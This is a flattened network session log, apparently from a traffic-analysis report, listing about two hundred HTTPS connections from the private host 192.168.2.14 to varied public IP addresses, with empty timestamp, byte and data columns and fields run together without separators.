                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16916192.168.2.1452480196.83.128.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16917192.168.2.1444512182.53.52.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16918192.168.2.1438460149.175.236.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16919192.168.2.1444688167.6.168.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16920192.168.2.1434620186.179.161.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16921192.168.2.144619234.200.138.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16922192.168.2.143285849.39.128.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16923192.168.2.1439594147.74.82.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16924192.168.2.143511291.234.50.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16925192.168.2.145625888.237.43.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16926192.168.2.1460560146.239.76.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16927192.168.2.1443996113.117.67.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16928192.168.2.1433592143.112.92.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16929192.168.2.1459514140.231.123.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16930192.168.2.145292232.185.212.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16931192.168.2.1453312146.96.9.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16932192.168.2.1457606198.190.192.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16933192.168.2.145798054.137.100.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16934192.168.2.145706494.45.209.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16935192.168.2.145983640.22.221.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16936192.168.2.145824648.232.139.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16937192.168.2.14448588.242.252.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16938192.168.2.1457314166.241.27.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16939192.168.2.144872067.61.87.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16940192.168.2.1455634218.125.209.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16941192.168.2.1453016184.14.130.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16942192.168.2.145178865.141.200.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16943192.168.2.1439118116.118.206.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16944192.168.2.1453172145.106.178.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16945192.168.2.14484465.72.233.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16946192.168.2.1448542207.131.38.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16947192.168.2.1445970217.207.41.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16948192.168.2.1460792190.42.77.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16949192.168.2.1445674169.102.226.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16950192.168.2.1436378213.219.160.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16951192.168.2.145264431.71.4.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16952192.168.2.1451726102.45.27.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16953192.168.2.145253272.94.65.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16954192.168.2.144531299.149.108.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16955192.168.2.1452580170.83.82.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16956192.168.2.144027043.115.180.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16957192.168.2.1434698114.197.10.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16958192.168.2.1460180195.243.227.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16959192.168.2.1439152116.234.49.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16960192.168.2.1460824202.27.147.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16961192.168.2.1455488166.54.216.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16962192.168.2.1457028133.105.145.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16963192.168.2.1457676104.187.248.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16964192.168.2.1439048118.124.179.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16965192.168.2.1433816141.176.46.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16966192.168.2.1455518172.55.121.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16967192.168.2.1460078210.105.103.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16968192.168.2.1453964170.162.118.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16969192.168.2.1460186171.182.196.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16970192.168.2.145072649.2.19.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16971192.168.2.1444810134.132.86.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16972192.168.2.143384279.9.21.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16973192.168.2.144775865.163.144.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16974192.168.2.143495493.6.196.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16975192.168.2.1451826142.61.90.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16976192.168.2.1458778160.253.201.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16977192.168.2.1434854175.101.79.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16978192.168.2.1458820125.252.244.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16979192.168.2.1436824145.7.65.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16980192.168.2.1450008211.65.179.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16981192.168.2.145243489.157.117.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16982192.168.2.1435272191.237.93.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16983192.168.2.1451270173.227.55.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16984192.168.2.144889075.251.128.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16985192.168.2.1446570119.5.14.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16986192.168.2.145517660.204.117.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16987192.168.2.1446082104.155.17.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16988192.168.2.14500528.55.81.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16989192.168.2.144207859.50.108.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16990192.168.2.1456946205.3.113.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16991192.168.2.143752824.46.246.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16992192.168.2.144572218.241.84.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16993192.168.2.1443934123.122.217.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16994192.168.2.143674292.228.211.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16995192.168.2.1434730149.155.122.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16996192.168.2.1449018153.137.107.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16997192.168.2.143422065.11.135.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16998192.168.2.145564647.133.125.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16999192.168.2.143625654.104.230.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17000192.168.2.1437814125.226.196.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17001192.168.2.144184812.12.23.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17002192.168.2.143470819.165.225.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17003192.168.2.1434252111.223.139.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17004192.168.2.1434992130.105.175.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17005192.168.2.1440704194.249.134.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17006192.168.2.1452248173.223.200.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17007192.168.2.145180288.176.212.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17008192.168.2.1453274175.168.159.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17009192.168.2.146033261.169.19.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17010192.168.2.1435738207.95.83.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17011192.168.2.145270223.92.233.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17012192.168.2.145281084.57.183.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17013192.168.2.143743291.135.8.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17014192.168.2.143690247.222.196.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17015192.168.2.1438818216.241.95.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17016192.168.2.144374872.61.184.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17017192.168.2.143283438.175.228.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17018192.168.2.143383835.88.2.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17019192.168.2.145159271.163.64.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17020192.168.2.145739288.238.146.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17021192.168.2.1441866186.255.134.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17022192.168.2.145650262.23.155.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17023192.168.2.145375865.112.251.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17024192.168.2.1433354115.40.24.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17025192.168.2.143351682.157.165.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17026192.168.2.1459778189.206.38.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17027192.168.2.1453634154.29.30.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17028192.168.2.1446222135.61.39.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17029192.168.2.1457778111.61.47.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17030192.168.2.144666632.177.52.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17031192.168.2.143619844.94.38.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17032192.168.2.145933078.145.89.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17033192.168.2.143683271.113.156.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17034192.168.2.146057636.106.122.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17035192.168.2.1456594217.205.193.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17036192.168.2.14566848.252.121.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17037192.168.2.1448918217.180.106.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17038192.168.2.1433340129.53.180.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17039192.168.2.1449414100.225.218.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17040192.168.2.144902424.108.59.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17041192.168.2.1459676202.88.237.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17042192.168.2.1447426199.140.93.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17043192.168.2.143563478.224.40.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17044192.168.2.145615823.77.52.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17045192.168.2.144249096.132.35.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17046192.168.2.145004465.50.87.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17047192.168.2.145670292.93.145.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17048192.168.2.144162013.177.33.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17049192.168.2.1437396126.57.161.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17050192.168.2.1446564166.53.42.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17051192.168.2.14413324.144.5.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17052192.168.2.1450556148.159.3.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17053192.168.2.144426648.40.101.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17054192.168.2.143773671.220.188.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17055192.168.2.145958649.191.225.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17056192.168.2.145614290.145.41.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17057192.168.2.143368292.78.247.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17058192.168.2.1443208187.240.164.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17059192.168.2.1445708115.213.39.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17060192.168.2.144250463.12.220.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17061192.168.2.1447438125.64.156.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17062192.168.2.1455444147.14.9.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17063192.168.2.1447004135.78.163.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17064192.168.2.145291698.35.82.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17065192.168.2.14535489.252.87.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17066192.168.2.1437414161.214.57.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17067192.168.2.145414438.131.218.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17068192.168.2.1456732133.84.245.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17069192.168.2.1438288170.121.209.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17070192.168.2.145223444.168.190.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17071192.168.2.144216095.188.176.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17072192.168.2.143960297.175.160.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17073192.168.2.14472145.14.142.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17074192.168.2.145342484.55.31.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17075192.168.2.145006486.9.109.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17076192.168.2.144611863.203.74.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17077192.168.2.145247051.28.27.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17078192.168.2.1442790186.27.56.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17079192.168.2.144098099.28.107.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17080192.168.2.1436332195.152.189.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17081192.168.2.1455030200.177.73.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17082192.168.2.1460972101.229.166.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17083192.168.2.143550859.13.140.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17084192.168.2.1438146136.56.196.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17085192.168.2.1454558113.10.3.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17086192.168.2.1433178129.3.66.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17087192.168.2.1449406123.163.88.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17088192.168.2.1438688181.70.239.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17089192.168.2.145367249.61.213.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17090192.168.2.145923653.219.185.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17091192.168.2.1446478176.105.219.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17092192.168.2.1446942186.141.225.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17093192.168.2.143582844.192.181.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17094192.168.2.1443926185.232.223.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17095192.168.2.144326432.222.249.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17096192.168.2.1433086133.123.45.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17097192.168.2.1445800116.31.103.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17098192.168.2.1432806187.167.104.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17099192.168.2.144721899.255.251.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17100192.168.2.1442110144.94.40.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17101192.168.2.1443174179.250.187.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17102192.168.2.144259831.221.96.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17103192.168.2.1444936174.188.6.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17104192.168.2.144044225.19.79.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17105192.168.2.1445902187.10.29.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17106192.168.2.1460260220.137.99.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17107192.168.2.14332985.131.24.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17108192.168.2.145716614.166.220.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17109192.168.2.1445546106.194.176.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17110192.168.2.1432868176.1.33.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17111192.168.2.1451832100.243.107.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17112192.168.2.1433580172.242.190.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17113192.168.2.144702492.144.78.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17114192.168.2.1447730222.26.135.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17115192.168.2.1450722155.107.232.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17116192.168.2.1433482191.194.35.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17117192.168.2.1459154151.159.49.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17118192.168.2.1445286204.237.201.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17119192.168.2.1434802220.200.190.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17120192.168.2.1435224111.189.65.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17121192.168.2.1443866149.247.131.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17122192.168.2.1449238142.212.213.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17123192.168.2.1451898217.6.225.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17124192.168.2.144628683.46.252.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17125192.168.2.1457290149.28.189.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17126192.168.2.1437446149.124.196.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17127192.168.2.1438886131.27.143.97443
                                                        TimestampBytes transferredDirectionData


